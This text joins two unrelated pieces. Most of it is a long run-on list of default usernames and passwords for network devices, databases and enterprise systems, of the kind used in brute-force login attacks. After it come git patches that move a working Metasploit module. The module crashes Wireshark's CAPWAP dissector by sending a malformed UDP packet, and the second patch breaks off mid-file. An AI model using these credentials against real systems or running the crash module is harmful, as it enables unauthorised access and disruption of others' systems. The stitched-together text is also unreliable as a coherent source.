Ascend + _Cisco +MAIL MAIL +ami + sitecom +hsa hsadb +system password +MGR CAROLIAN +ADMINISTRATOR ADMINISTRATOR +admin sysAdmin +root tini +admin smcadmin + Helpdesk +FIELD SERVICE +PBX PBX +netman +HELLO FIELD.SUPPORT +system sys +hscroot abc123 +1502 1502 + star +superuser admin +HELLO MGR.SYS +sysadm anicust +Administrator Administrator +netrangr attack + Intel + 12345 +readwrite lucenttech1 + secret +piranha piranha +wlse wlsedb +admin cisco +l3 l3 +admin diamond +none admin +naadmin naadmin +public public +admin 1988 +admin radius +admin root +NETOP +Administrator letmein +HELLO MANAGER.SYS + raidzone + 3ascotel +MANAGER HPOFFICE +demo demo + 166816 +User Password +admin zoomadsl +D-Link D-Link +user public +user pass +l2 l2 +MGR CCC +rw rw +cgadmin cgadmin +storwatch specialist + secure +vcr NetVCR +OPERATOR COGNOS +piranha q +admin synnet +MDaemon MServer +root cms500 +root davox +jagadmin +enquiry enquirypw +at4400 at4400 +support h179350 +davox davox +admin asd +PFCUser 240653C9467E45 +setup changeme +superuser superuser + atc123 +aaa +root admin_1 + 266344 +MGR WORD +topicalt password +admin2 changeme +1234 1234 +MANAGER ITF3000 + connect +FIELD HPONLY +nms nmspw +client client +admin comcomcom + speedxess +MGR ROBELLE + epicrouter +sys uplink +OPERATOR SYSTEM +field support +MGR SYS +root letacla + FORCE +deskman changeme +MAIL REMOTE +SYSADM sysadm +superadmin secret + backdoor +pmd +MGR CNAS +admin 22222 +GEN2 gen2 + medion +ADMN admn +Factory 56789 +PRODDTA PRODDTA +tellabs tellabs#1 +spcl 0 +dadmin dadmin01 + comcomcom +administrator password +helpdesk OCS +dhs3mt dhs3mt +MGR SECURITY +setup changeme! 
+install llatsni +adfexc adfexc +IntraSwitch Asante +manage !manage +superman 21241036 +MANAGER TELESUP +craft crftpw +login 0 + help +MGR HPOFFICE + lantronix +SPOOLMAN HPOFFICE +manager admin + netadmin +ADVMAIL HP +FIELD SUPPORT +MANAGER SYS +MGR VESOFT +vt100 public +PSEAdmin $secure$ +HELLO OP.OPERATOR +Manager friend + hs7mwxkk +patrol patrol + SUPER + SMDR + 1064 +teacher password +PCUSER SYS +MGR ITF3000 +Any 12345 +OPERATOR DISC +RSBCMON SYS +cellit cellit +MGR INTX3 +inads inads +halt tlah +root wyse +locate locatepw +admin visual +TMAR#HWMT8007079 +rapport r@p8p0r+ +MGR TELESUP +xbox xbox + TENmanUFactOryPOWER +device device +NICONEX NICONEX +admin admin1234 +root fivranne +acc acc +31994 31994 +admin netadmin +bcim bcimpw +websecadm changeme +blue bluepw +topicnorm password +supervisor PlsChgMe + R1QTPS +MGR HPONLY +ccrusr ccrusr +root Cisco +login password +266344 266344 +MAIL MPE +telecom telecom +MAIL HPOFFICE +GEN1 gen1 +Administrator smcadmin +SSA SSA + snmp-Trap +HTTP HTTP + default +mtch mtch +admin adslolitec +Administrator ganteng +bciim bciimpw +browse browsepw +Admin Admin + Password +hydrasna +sys change_on_install +deskres password +bbsd-client changeme2 +anonymous Exabyte +admin rmnetlm +replicator replicator +intel intel +OPERATOR SUPPORT +MGR HPP196 +radware radware +intermec intermec +mlusr mlusr +MGR RJE +FIELD LOTUS +init initpw +e250 e250changeme +MAIL TELESUP +Polycom SpIp +temp1 password + adminttd +tech field +support supportpw +mac + MiniAP +MANAGER SECURITY +3comcso RIP000 +RMUser1 password +WP HPOFFICE +Administrator changeme +MGR XLSERVER +MGR HPP187 +MGR HPP189 +inads indspw +admin linga +craft craft + enter +NAU NAU +rcust rcustpw +admin AitbISP4eCiG +mtcl mtcl +MGR CONV +topicres password +bcnas bcnaspw +MGR NETBASE +admin access +public +adminuser OCS +MGR REGO +Root +cac_admin cacadmin +mediator mediator +superman talent +Anonymous +kermit kermit +admin x-admin +MGR HPDESK + 9999 +root ROOT500 +admin my_DEMARC +volition 
volition +GlobalAdmin GlobalAdmin + 4getme2 +LUCENT01 UI-PSWD-01 +admin 2222 +LUCENT02 UI-PSWD-02 +MANAGER TCH +adminstat OCS +desknorm password +IntraStack Asante +OPERATOR SYS +MGR COGNOS + Fireport + ILMI +maint maintpw +supervisor supervisor +e500 e500changeme +admin mu +MANAGER COGNOS +deskalt password +admin OCS +bbsd-client NULL +cust custpw +admin noway +tiara tiaranet +bcms bcmspw + TANDBERG +m1122 m1122 +telco telco +superuser +xd xd +dhs3pms dhs3pms +VNC winterm +craft craftpw +maint rwmaint +anonymous any@ +login access +browse looker +customer none +cisco cisco +adminstrator changeme +FIELD MANAGER + 1234admin +FIELD MGR +ftp_nmc tuxalize +me +iclock timely +echo User +ADVMAIL HPOFFICE DATA +login 1111 +login 8429 +Administrator manage + Babylon +admin hagpolm1 +root 12345 +scmadmin scmchangeme +user tivonpw +sysadm Admin +Administrator password +admin administrator +installer installer +webadmin webadmin +ftp_inst pbxk1064 +DDIC 19920706 + pento +admin NetSurvibox +SYSTEM D_SYSTPW +draytek 1234 + 3477 +operator $chwarzepumpe +administrator asecret +EARLYWATCH SUPPORT + 10023 +Manager Admin +super.super +ftp_oper help1954 +corecess corecess +superuser 123456 +admin Password +super.super master +admin Protector +SYSTEM MANAGER +webadmin 1234 +install secret +FIELD HPWORD PUB +admin 12345 +admin symbol +weblogic weblogic +Admin 1988 +system/manager sys/change_on_install +root 3ep5w2u + 8111 + jannie +End User 123 +none 0 +d.e.b.u.g User +admin tomcat +target password +Administrator pilou +MD110 help +Administrator 3ware + ANYCOM +tiger tiger123 +adminttd adminttd +admin asante +admin smallbusiness +admin netscreen +FIELD HPP187 SYS +guest User +maint ntacdmax +admin w2402 +wlseuser wlsepassword +SAPCPIC admin +ftp_admi kilo1987 +admin articon +mtcl +default.password +admin michelangelo +manager changeme +root Mau'dib + Serial Num +root ggdaseuaimhrke +7 maintain +2 syslib +ADMIN admin +system weblogic +Administrator ggdaseuaimhrke +ADMIN +itsadmin init 
+PUBSUB PUBSUB +admin demo +system manager +sys sys +CTXSYS CTXSYS +ftp +bill bill +192.168.1.1 60020 @dsl_xilno +FIELD +admin dmr99 +setpriv system +GUEST GUEST +SAP* 06071992 +operator 1234 +t3admin Trintech +hello hello +supervisor +CISCO15 otbu+1 +1.79 Multi + babbit +mso w0rkplac3rul3s +Telecom Telecom +qsysopr qsysopr +admin TANDBERG +admin imss7.0 + nokia +APPS APPS +Developer isdev +mail mail +admin draadloos +qsecofr qsecofr +11111 x-admin + default.password +Service 5678 +enable cisco +netadmin nimdaten +Polycom 456 +admin P@55w0rd! +admin 1234admin +root par0t +any system +db2fenc1 db2fenc1 +johnson control +2 maintain +isp isp +demos +QSRV QSRV +root iDirect +MDSYS MDSYS +Admin 123456 +2 manager +vpasp vpasp +TEST TEST + Telecom +QSECOFR QSECOFR +adm none + 2501 +1 syslib +system security +admin leviton +!root blank +informix informix +root mpegvideo +5 games +root 0P3N +engmode hawk201 +scout scout +qpgmr qpgmr +admin admin000 +ADSL expert03 +cisco +images images +admin security +admin surecom +Gearguy Geardog + symantec +comcast +admin adslroot +1 manager +Demo + xyzzy +Administrator adaptec +system system +SAP* PASS +serial# serial# +BACKUP BACKUP +stratacom stratauser +root rootme +6.x +root !root +webadmin webibm + riverhead +mary password +COMPANY COMPANY +SYS SYS +DSL DSL +Jetform +none amber +eagle eagle +ROUTER +root brightmail +admin pass + HEWITT RAND +ods ods +siteadmin toplayer +admin OkiLAN +root rootpass +Alphanetworks wrgg15_di524 + x40rocks + nokai +Admin1 Admin1 +field field +Admin admin +Admin ImageFolio + iolan + manager +admin pfsense +janta sales janta211 +servlet manager +username password +citel password +Replicator iscopy +SYSMAN OEM_TEMP +1 operator +SYSTEM SYSTEM +administrator RSAAppliance +master themaster01 +Admin 1234 +2 operator +SUPERUSER ANS#150 +admin passwort +cn=orcladmin welcome +30 games +maintainer admin +setup + hello +admin NetSeq +BRIO_ADMIN BRIO_ADMIN + citel +internal oracle +CQSCHEMAUSER PASSWORD +root 
kn1TG7psLu +SYS SYSPASS + lkwpeter +DEV2000_DEMOS DEV2000_DEMOS +FSFTASK1 +checkfs checkfs +BACKUP +USER1 USER1 +root TENmanUFactOryPOWER +SQLDBA +root resumix +HELP HELP +toor logapp +SYS 0RACLE9 +SYS 0RACLE8 + 57gbzb +!root none +qsrvbas qsrvbas +SYSADMIN +EZsetup +Administrator 1234 + sldkj754 +BATCH +STRAT_USER STRAT_PASSWD +Administrator 19750407 + User +user USERP +primenet primeos +OEMREP OEMREP +admin [^_^] +USER6 USER6 +lynx + TTPTHA +powerdown powerdown +root Mau’dib +SYSTEM ORACL3 +$ALOC$ +password +VOL-0215 +admin nimda +tomcat tomcat +REP_MANAGER DEMO +WinCCConnect 2WSXcder +ALLIN1 ALLIN1 +DIRMAINT +eqadmin Serial port only equalizer +sysadm sysadmpw +QSRVBAS QSRVBAS +admin ip305Beheer +debug tech + ACCORD +AQJAVA AQJAVA +LASERWRITER LASERWRITER +Administrator 0000 +root nsi +PERFSTAT PERFSTAT +apcuser apc +MBWATCH MBWATCH + protection +system_admin +unix unix +OWNER OWNER +NETPRIV NETPRIV +VSEMAINT + AWARD?SW +DEMO DEMO +tomcat changethis +SYMPA SYMPA +REP_OWNER REP_OWNER +DCL DCL +FAX +root dbps +ARCHIVIST ARCHIVIST +USER PASSWORD +VTAMUSER +LASERWRITER +VMTAPE +basisk basisk +NetLinx password +OutOfBox demos guest 4DGifts (none by default) +none letmein +NETMGR NETMGR +DEFAULT USER +OAS_PUBLIC OAS_PUBLIC +read +AP AP +demos demos +SYSTEM Admin +admin j5Brn9 +MTSSYS MTSSYS +SYSMAINT DIGITAL +AUDIOUSER AUDIOUSER +Joe hello +IDMS + teX1 +admin allot +$SRV $SRV +snake +SYS 0RACLE +ADVMAIL +Administrator nicecti +ROOT ROOT +PRINTER PRINTER +shutdown +satan + m1link +RDM470 +master access + l2 + l1 +trouble trouble +fax +OP1 +admin@example.com admin +root trendimsa1.0 +HOST HOST +ADLDEMO ADLDEMO +QS_ADM QS_ADM +bin sys + AMI +OPER OPER +oracle +jj +PO7 PO7 +SYSTEM 0RACLE8 +SYSTEM 0RACLE9 +www +joe password + komprie + 123 +MAINT MAINT +CMSBATCH +root toor +CCC +role1 tomcat +DATAMOVE +lp + AMISETUP + sp99dd +halt halt +MSHOME MSHOME +ISPVM +crowd­-openid-­server password +user_editor demo +sedacm secacm +ROOT +Admin 3Com +db2admin db2admin +Airaya Airaya 
+supervisor visor +none Wireless +SYSDUMP1 +IMEDIA IMEDIA + Biostar +install install +primos_cs primos +admin infrant1 +Administrator Partner + Administrative +USER_TEMPLATE USER_TEMPLATE +pnadmin pnadmin + h6BB +lpadmin lpadmin +guest none +VTAM VTAM +TRACESVR TRACE +POSTMASTER POSTMASTER +MAILER MAILER +RSCSV2 +QS_WS QS_WS + sma +system_admin system_admin +circ +Demo password + rwa +nobody nobody +Tasman Tasmannet +admin !admin +DISCOVERER_ADMIN DISCOVERER_ADMIN +VMASMON +LR-ISDN LR-ISDN +TURBINE TURBINE +GL GL +PO PO + AMI_SW +super superpass +PRINT +MODTEST YES +GATEWAY GATEWAY +root system +PRIMARY PRIMARY +both tomcat + award.sw +haasadm lucy99 +pw pwpw +games games +DOCSIS_APP 3Com +bbs +EMP EMP +Admin cclfb +postmaster +SITEMINDER SITEMINDER +Any Any +vgnadmin vgnadmin +RJE RJE +gonzo +NEWS NEWS +sa Ektron + Award +AQUSER AQUSER +UTLBSTATU UTLESTAT + AMIAMI +netbotz netbotz +CTXSYS CHANGE_ON_INSTALL +xmi_demo sap123 + Crystal + Daewuu +ftp ftp +ORACACHE (random password) +MCUser MCUser1 +prash hello +sync +sysadm admpw +root rootadmin +PM PM +AP2SVP +master master +ibm 2222 +ULTIMATE ULTIMATE +SABRE +role1 role1 +user_pricer demo +admin enhydra +SUPERVISOR NF +EVENT EVENT + xyzall + rainbow +ADMIN JETSPEED +SYS ORACL3 +PORTAL30_SSO_PS PORTAL30_SSO_PS +FSFADMIN +OO OO +WKSYS WKSYS +OPERATNS OPERATNS + ksdjfg934t +UVPIM_ + merlin +OE OE +Any Local User Local User password +OCITEST OCITEST +web + HLT +ADMINISTRATOR admin +ESSEX + last +CTXSYS +None xyzzy +CTXDEMO CTXDEMO +user_designer demo + Admin + zebra +QDBA QDBA +role changethis +LRISDN LRISDN +tele tele +WEBCAL01 WEBCAL01 +rsadmin rsadmin +OMWB_EMULATION ORACLE +root alien +WINDOWS_PASSTHRU + sanfran +public ReadOnly access secret + AMIPSWD +MOREAU MOREAU +fast abd234 +root QNX +host dnnhost +administrator root +admin public +SYSTEM ORACLE + sertafu +ORDPLUGINS ORDPLUGINS +SYSWRM +mail + telos +ADMIN ADMIN +administrator adminpass +savelogs crash + ACCESS +SDOS_ICSAP SDOS_ICSAP +system adminpwd +BATCH 
BATCH +GUEST GUESTGUEST +SYSMAINT SYSMAINT +postmaster postmast +DSSYS DSSYS + award_ps + ZAAADA +MGWUSER MGWUSER + NTCIP +OPERATOR + hewlpack +TDOS_ICSAP TDOS_ICSAP +ssp ssp +EJSADMIN EJSADMIN + damin +INGRES INGRES +DS + A.M.I +estheralastruey + 1322222 +VCSRV VCSRV +Administrator storageserver +ssladmin ssladmin +CLARK CLOTH +shutdown shutdown +administrator 1234 +OEMADM OEMADM +restoreonly restoreonly1 +quser quser +PRINTER +MILLER MILLER +trmcnfg trmcnfg +REPORT REPORT +user_author demo + aLLy +dpn changeme +tour tour +mountfsys mountfsys +http +PROG PROG + iwill +openfiler password + Public +admin mp3mystic +RAID hpt +read synnet +admin peribit +STARTER STARTER +FAXUSER +GUEST GUESTGUE +DSA + guardone +daemon daemon +mountsys mountsys +SYSTEM ORACLE9 +SYSTEM ORACLE8 + gandalf +backuponly backuponly1 +IVPM1 + leaves +sysadm syspw +root blablabla + Compleri +USER3 USER3 +OPENSPIRIT OPENSPIRIT + spooml + changeit + wg +prime primeos +HPLASER + Vextrex +CSPUSER +qsvr qsvr +lynx lynx +SYSCKP +root letmein +Sysop Sysop +user_marketer demo +IMAGEUSER IMAGEUSER +root Password +bsxuser bsxpass +MASTER PASSWORD +USER9 USER9 +root ax400 +OLAPSYS MANAGER +SYSTEM OPERATOR +oracle oracle +root Mau?dib + MASTER +root t00lk1t +rsadmin + Daytec +OutOfBox + SZYX + cmaker + CTX_123 +rje rje +ODM_MTR MTRPW +QS_ES QS_ES +lansweeperuser mysecretpassword0* +DEMO3 +Username password +GPLD GPLD +uucp uucp +DBSNMP DBSNMP +VMARCH +GUEST TSEUG +SWUSER SWUSER +root 8RttoTriz +VTAM +OPERATNS +Operator Operator +CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me 
+SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 +QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass 
+rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW +SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD 
+Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! 
+CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD + 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 +administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin 
+FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? +SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM 
From 74b491e715ccec4434a537ba87bc5ed69438be8c Mon Sep 17 00:00:00 2001
From: JoseMi <jholgui@gmail.com>
Date: Sat, 17 May 2014 11:25:38 +0100
Subject: [PATCH 329/853] Delete wireshark_capwap_dos module
---
.../windows/misc/wireshark_capwap_dos.rb | 69 -------------------
1 file changed, 69 deletions(-)
delete mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb
diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb
deleted file mode 100644
index 603f5e81ca..0000000000
--- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb
+++ /dev/null
@@ -1,69 +0,0 @@
-#
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-
- Rank = GoodRanking
-
- include Msf::Exploit::Remote::Udp
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Wireshark CAPWAP dissector crash',
- 'Description' => %q{
- This module inject malicious packet udp to crash wireshark. The crash is when we send
- a incomplete packet and trigger capwap dissector.
- )
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'j0sm1', # Exploit and msf module
- 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti"
- ],
- 'References' =>
- [
- [ 'CVE', '2013-4074'],
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Payload' =>
- {
- 'DisableNops' => 'True',
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- [ 'Wireshark CAPWAP dissector CRASH',
- {
- }
- ],
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Apr 28 2014',
- 'DefaultTarget' => 0))
-
- # Protocol capwap needs port 5247 to trigger the dissector in wireshark
- register_options([ Opt::RPORT(5247) ], self.class)
-
- end
-
- def exploit
-
- connect_udp
-
- # We send a packet incomplete to crash dissector
- print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
- buf = "\x90" * 18
- udp_sock.put(buf)
-
- disconnect_udp
-
- end
-end
From 21cf0a162cb8619dc950a765cdd49d57be597e5a Mon Sep 17 00:00:00 2001
From: JoseMi <jholgui@gmail.com>
Date: Sat, 17 May 2014 11:31:43 +0100
Subject: [PATCH 330/853] Added module to crash capwap dissector in wireshark tool
---
.../dos/wireshark/wireshark_capwap_dos.rb | 69 +++++++++++++++++++
1 file changed, 69 insertions(+)
create mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
new file mode 100644
index 0000000000..603f5e81ca
--- /dev/null
+++ b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
@@ -0,0 +1,69 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Wireshark CAPWAP dissector crash',
+ 'Description' => %q{
+ This module inject malicious packet udp to crash wireshark. The crash is when we send
+ a incomplete packet and trigger capwap dissector.
+ )
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'j0sm1', # Exploit and msf module
